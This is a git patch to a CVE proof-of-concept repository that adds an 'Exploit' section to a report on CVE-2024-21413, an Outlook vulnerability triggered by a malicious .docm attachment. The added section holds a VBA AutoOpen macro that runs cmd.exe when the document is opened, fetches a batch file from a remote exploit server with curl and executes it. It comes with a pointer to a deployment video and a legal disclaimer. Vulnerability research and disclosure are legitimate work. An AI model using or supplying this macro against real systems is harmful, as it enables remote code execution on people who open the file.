From 84947641734de4fb8914270f8544bfefa56b19b0 Mon Sep 17 00:00:00 2001 From: nu11secur1ty Date: Fri, 22 Mar 2024 09:07:01 +0200 Subject: [PATCH] Update report.txt --- 2024/CVE-2024-21413/docs/report.txt | 10 ++++++++++ 1 file changed, 10 insertions(+) diff --git a/2024/CVE-2024-21413/docs/report.txt b/2024/CVE-2024-21413/docs/report.txt index 30b36bf..a69c91e 100644 --- a/2024/CVE-2024-21413/docs/report.txt +++ b/2024/CVE-2024-21413/docs/report.txt @@ -11,6 +11,16 @@ By sending a malicious (.docm) file, to the victim using the Outlook mail – ap STATUS: MEDIUM- Vulnerability +## Exploit: +The exploit can be deployed on a remote attacking server, as you can see on the second [video](https://youtu.be/zxrlV8lgoB0?si=YrTOR3wk_QLuABbd). +I am not responsible if someone breaks someone's system. You will respond FRONT OF THE LAW! + +``` +Sub AutoOpen() + Call Shell("cmd.exe /S /c" & "curl -s https://path_to_your_exploit_server.bat > PoC.bat && .\PoC.bat", vbNormalFocus) +End Sub +``` + ## Source: [href](https://github.com/nu11secur1ty/CVE-mitre/tree/main/2024/CVE-2024-21413)